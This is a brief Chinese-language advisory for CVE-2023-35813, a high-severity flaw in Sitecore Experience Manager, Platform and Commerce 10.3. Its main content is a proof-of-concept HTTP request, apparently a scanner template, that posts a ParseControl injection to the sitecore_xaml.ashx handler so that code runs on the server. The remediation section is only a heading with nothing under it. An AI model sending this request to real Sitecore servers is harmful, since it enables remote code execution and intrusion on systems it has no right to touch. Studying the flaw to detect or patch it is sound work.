CVE-2023-35813
高危
Sitecore致力于为企业提供一个集成的平台,通过利用大数据和人工智能技术来个性化内容交付,从而优化用户体验并推动营销效果。
Experience Manager 10.3
Experience Platform 10.3
Experience Commerce 10.3
0x05 POC
POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl("{{url_encode(payload)}}")
0x06 修复建议